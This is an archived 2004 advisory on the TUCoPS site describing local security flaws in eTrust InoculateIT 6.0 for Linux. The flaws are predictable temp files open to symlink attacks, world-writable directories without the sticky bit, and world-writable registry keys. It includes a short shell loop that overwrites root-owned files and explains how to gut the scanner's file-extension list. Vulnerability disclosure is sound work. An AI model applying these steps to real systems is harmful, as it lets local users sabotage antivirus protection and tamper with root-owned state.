Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Security App Flaws :: hack0946.htm

eTrust Virus Protection 6.0 InoculateIT for linux



[local problems] eTrust Virus Protection 6.0 InoculateIT for linux



author: l0om   

software: eTrust Virus Protection 6.0 InoculateIT for 

linux 

 

local phun with etrust antivirus 6.0 inoculateIT 

linux 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

 

 

eTrust InnoculateIT 6.0 comes for the following OSes: 

-windows 95/98/ME 

-windows nt 4.0/2000 

-novell netware 3.x 4.x 5.x 

-lotus notes/domino 

-mircosoft exchange server 

-and finally linux (SuSE, RedHat, Caldera, Turbo 

Linux) 

 

eTrust is a antivirus program which can scan nearly 

every fileformat 

for viruses. i have installed the version for linux 

on my SuSE 9.0 system 

and noticed the following security flaws: 

 

 

1) possible symlink attacks in some scripts 

 

  by the way- the env variable $CAIGLBL0000 can be /

usr/local/eTrust/ for example. 

  however - the $CAIGLGL0000/tmp IS world writable... 

 

ino/scripts/inoregupdate 

######################## 

[...] 

tfn=$CAIGLBL0000/tmp/.inoreg.ns.$$ 

$NETSTAT -i 2>/dev/null | grep -v localhost > $tfn 

[...] 

 

 

scripts/uniftest 

################ 

local=$CAIGLBL0000/tmp 

local1=$CAIGLBL0000/scripts 

[...] 

    $CAIGLBL0000/bin/unips > $local/unips.$$ 

    awk -f $local1/uniftest.awk $local/unips.$$ 

    st_rc=$? 

    rm $local/unips.$$ 

[...] 

 

scripts/unimove 

############### 

           sed -e "s!$from!$to!g" $fn > /

tmp/.unimove.sed #<-- creats it now 

           diff $fn /tmp/.unimove.sed > /dev/null 

           if [ $? != 0 -a -s /tmp/.unimove.sed ]; 

then 

                mv /tmp/.unimove.sed  $fn 

           rm /tmp/.unimove.sed    # dels it if 

finished 

 

 

2) some directorys in /tmp dont have the sticky bit 

set 

an example: 

 

eTrustAE.lnx/tmp/.caipcs/ # ls -l 

drwxrwxrwx    8 root     root          240 2004-02-05 

09:58 . 

drwxrwxrwx    4 root     root          160 2004-02-09 

16:53 .. 

drwxrwxrwx    2 root     root           48 2004-02-05 

09:54 .file 

-rw-r--r--    1 root     root         4110 2004-02-05 

09:58 ipcrm.log 

drwxrwxrwx    2 root     root          856 2004-02-05 

10:48 .nob_event 

drwxrwxrwx    2 root     root         1168 2004-02-05 

10:48 .nob_mutex 

drwxrwxrwx    2 root     root           48 2004-02-05 

09:54 .nob_sem 

drwxrwxrwx    2 root     root          384 2004-02-05 

10:48 .sem 

drwxrwxrwx    2 root     root           80 2004-02-05 

10:48 .shm 

 

eTrustAE.lnx/tmp/.caipcs # ls -l .sem 

drwxrwxrwx    2 root     root          384 2004-02-05 

10:48 . 

drwxrwxrwx    8 root     root          240 2004-02-05 

09:58 .. 

-rw-------    1 root     root           20 2004-02-05 

10:01 3571729 

-rw-------    1 root     root            5 2004-02-05 

09:58 3702805 

-rw-------    1 root     root           25 2004-02-05 

10:01 3735574 

-rw-------    1 root     root           25 2004-02-05 

10:01 3768343 

-rw-------    1 root     root           15 2004-02-05 

09:58 3801112 

 

this directory includes values which are kinda 

sensetive. so only root can 

read or write them as we can see at this 

filepermissions. 

but as the upper directory /.sem has no sticky bit 

set and is world writeable. 

we can simple overwrite these files as the directory 

permissions are of a 

higher priority as the file permissions. this is the 

truth for a handful of 

directorys. 

for example: 

 

badass~:> phun() 

{ 

for i in `ls /usr/local/eTrustAE.lnx/

tmp/.caipcs/.sem`; do 

cp -f ~/myblankass.ascii /usr/local/eTrustAE.lnx/

tmp/.caipcs/.sem/$i 

done 

echo jupp 

} 

badass~:> phun 

jupp 

badass~:> 

 

 

3) world writeable 

 

with the linux version of etrust there come some 

directroys which we all know- the 

"registry". it seems like the whole registry key is 

world writeable: 

 

>find ./ -type f -perm -2 -print 

./registry/hkey_current_user/software/

computerassociates/inoculateit/6.0/local_scanner/

macro_cure_action 

./registry/hkey_current_user/software/

computerassociates/inoculateit/6.0/local_scanner/

scan_files 

./registry/hkey_current_user/software/

computerassociates/inoculateit/6.0/local_scanner/

log_infected_files 

./registry/hkey_current_user/software/

computerassociates/inoculateit/6.0/local_scanner/

specified_list 

./registry/hkey_local_machine/software/

computerassociates/scanengine/path/home 

./registry/hkey_local_machine/software/

computerassociates/scanengine/path/logs 

[...] 

 

they got the sticky bit set, therefore we cannot 

overwrite or delte them, but sometimes we can 

change sensetive values in the registry. for example: 

 

cat ./registry/hkey_current_user/software/

computerassociates/inoculateit/6.0/local_scanner/

specified_list 

|COM|DLL|DOT|DOC|EXE|SYS|VXD|XLA|XLS|XLT|XLW|RTF|WIZ|

386|ADT|BIN|CBT|CLA|CPL|CSC|DRV|HTM|HTT|JS|MDB|MSO|

POT| 

PPT|SCR|SHS|VBS|VSD|VST|VSS|OCX|HLP|CHM|MSI|VBE|JSE|

PIF|BAT| 

 

this key contains a list of fileends which specifies 

what files should be scaned for a virus. 

a normal user can simply delte all values except one 

from this list, and can make the scanner pretty 

lame... 

furthermore there are worldwritable keys like 

"windows/currentversion", with keys which include the 

path to 

the normal binarys ("/usr/bin"). it may be possible 

to execute whatever you want on a reboot if you 

change 

the right keys in the right way. 

 

 

 

have phun! 

	feel phree! 

		life phat! 

 

YaCP - (Y)ast (a)nother (C)yber(P)unk 

 

--l0om 

--www.excluded.org 

 

 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH